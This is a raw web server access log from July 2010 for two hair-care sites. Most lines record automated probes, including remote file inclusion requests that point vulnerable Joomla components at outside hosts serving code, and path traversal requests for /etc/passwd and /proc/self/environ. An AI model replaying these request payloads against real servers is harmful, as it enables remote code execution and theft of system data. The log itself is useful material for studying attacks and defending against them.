208.115.111.245 - - [12/Jul/2010:03:41:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16234 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
195.234.4.132 - - [12/Jul/2010:03:41:29 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://noticias.emisorasunidas.com/drafts/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.234.4.132 - - [12/Jul/2010:03:41:29 -0700] "GET /logs/access_100104.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://noticias.emisorasunidas.com/drafts/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.234.4.132 - - [12/Jul/2010:03:41:29 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://noticias.emisorasunidas.com/drafts/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:03:41:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:41:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5129 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:41:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5733 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:03:41:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8760 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
89.189.179.214 - - [12/Jul/2010:03:43:48 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:03:47:34 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:03:48:15 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:03:49:33 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:03:49:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:03:49:36 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:03:50:02 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:03:50:02 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:03:50:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:03:50:04 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
195.234.4.132 - - [12/Jul/2010:03:50:49 -0700] "GET /logs/access_100104.log//bbs//skin/ggambo7002_board/write.php?dir=http://noticias.emisorasunidas.com/drafts/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:03:52:45 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:03:52:46 -0700] "GET /tmp/?D=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:03:54:24 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
89.189.179.214 - - [12/Jul/2010:04:03:22 -0700] "GET /logs/access_100419.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
89.189.179.214 - - [12/Jul/2010:04:03:22 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
89.189.179.214 - - [12/Jul/2010:04:03:23 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:04:07:10 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:04:07:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:04:07:10 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:04:08:46 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:04:10:53 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:04:10:53 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:04:10:53 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:04:10:55 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:04:23:50 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
66.249.65.237 - - [12/Jul/2010:04:24:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
65.254.36.102 - - [12/Jul/2010:04:32:27 -0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
213.171.37.206 - - [12/Jul/2010:04:33:00 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
213.171.37.206 - - [12/Jul/2010:04:33:00 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
213.171.37.206 - - [12/Jul/2010:04:33:00 -0700] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:33:13 -0700] "GET /logs/access_100628.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.216.172.214 - - [12/Jul/2010:04:33:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.216.172.214 - - [12/Jul/2010:04:33:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.201.82.173 - - [12/Jul/2010:04:34:01 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
122.201.82.173 - - [12/Jul/2010:04:34:01 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
204.15.135.138 - - [12/Jul/2010:04:34:11 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.135.138 - - [12/Jul/2010:04:34:11 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.135.138 - - [12/Jul/2010:04:34:11 -0700] "GET /logs/access_100426.log//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.135.138 - - [12/Jul/2010:04:34:20 -0700] "GET /logs/access_100426.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.135.138 - - [12/Jul/2010:04:34:25 -0700] "GET /logs/access_100419.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.135.138 - - [12/Jul/2010:04:34:37 -0700] "GET /logs/access_100503.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://4-computerhelp.com//templates/system/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.216.172.214 - - [12/Jul/2010:04:35:52 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:35:52 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:35:52 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /index.php?option=com_php&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /logs/access.log%20//index.php?option=com_php&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /logs//index.php?option=com_php&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /index.php?option=com_php&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /logs/access.log%20//index.php?option=com_php&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:36:16 -0700] "GET /logs//index.php?option=com_php&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:04:38:59 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
122.216.172.214 - - [12/Jul/2010:04:39:45 -0700] "GET /logs/access_100607.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:40:03 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:40:03 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
122.216.172.214 - - [12/Jul/2010:04:40:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /logs/access.log%20//index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /logs//index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /logs/access.log%20//index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /logs//index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
91.196.124.2 - - [12/Jul/2010:04:42:31 -0700] "GET /index.php?option=com_noticeboard&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:42:54 -0700] "GET /logs/access.log//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:42:54 -0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:42:54 -0700] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
91.199.120.82 - - [12/Jul/2010:04:44:06 -0700] "GET /index.php?option=com_jequoteform&view=http://www.abcsamenkomsten.nl/bin/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
91.199.120.82 - - [12/Jul/2010:04:44:06 -0700] "GET /logs//index.php?option=com_jequoteform&view=http://www.abcsamenkomsten.nl/bin/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
91.199.120.82 - - [12/Jul/2010:04:44:06 -0700] "GET /logs/access.log//index.php?option=com_jequoteform&view=http://www.abcsamenkomsten.nl/bin/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
208.80.193.121 - - [12/Jul/2010:04:45:54 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MEGAUPLOAD 1.0)" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:03 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:03 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:03 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:03 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:03 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:05 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:56 -0700] "GET /logs/access_100705.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.82.199 - - [12/Jul/2010:04:47:56 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.82.199 - - [12/Jul/2010:04:47:56 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.82.199 - - [12/Jul/2010:04:47:56 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:48:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:48:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:48:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:04:49:29 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:05 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:05 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:16 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:17 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:29 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.216.175.2 - - [12/Jul/2010:04:50:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://007network.webs.com/id.htm? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:51:12 -0700] "GET /logs/access.log//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:51:12 -0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
65.254.36.102 - - [12/Jul/2010:04:51:12 -0700] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.222.34.35 - - [12/Jul/2010:04:51:45 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:04:53:23 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.18.213.162 - - [12/Jul/2010:04:53:23 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
208.101.2.242 - - [12/Jul/2010:04:54:59 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_rokdownloads&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
75.136.121.230 - - [12/Jul/2010:04:55:19 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:20 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:21 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:04:55:22 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:25 -0700] "GET /logs/access_100531.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:30 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:30 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:30 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [12/Jul/2010:04:55:32 -0700] "GET /logs/access_100531.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.jejucc.net/_APP/lib/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=142 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=236 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8327 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:04:56:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8442 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
